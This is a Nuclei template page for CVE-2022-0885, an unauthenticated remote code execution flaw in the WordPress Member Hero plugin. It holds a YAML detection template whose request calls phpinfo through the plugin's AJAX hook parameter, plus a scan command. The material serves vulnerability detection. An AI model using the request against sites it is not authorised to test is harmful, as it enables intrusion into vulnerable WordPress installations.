Skip to content
Nuclei Templates

Member Hero <=1.0.9 - Remote Code Execution

ID: CVE-2022-0885

Severity: critical

Author: theamanrawat

Tags: cve,cve2022,unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,memberhero

Description

Section titled “Description”

WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0885


info:
  name: Member Hero <=1.0.9 - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    An attacker can execute arbitrary code on the target system, potentially leading to a complete compromise of the WordPress site.
  remediation: |
    Update to the latest version of the Member Hero plugin (1.0.9 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df
    - https://wordpress.org/plugins/member-hero/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0885
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0885
    cwe-id: CWE-862
    epss-score: 0.28394
    epss-percentile: 0.96849
    cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: memberhero
    product: member_hero
    framework: wordpress
  tags: cve,cve2022,unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,memberhero


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
          - "<!DOCTYPE html"
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
        part: body
# digest: 4a0a00473045022051dbc234274f3d1ce57124afa53ac128cef0afb699ff2d5fe2ca71161ffb5767022100d8de5d05d97b9c84be77a7bd6e11c54ec3f2ca4c6fc16c60272b8a2727480615:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0885.yaml"

View on Github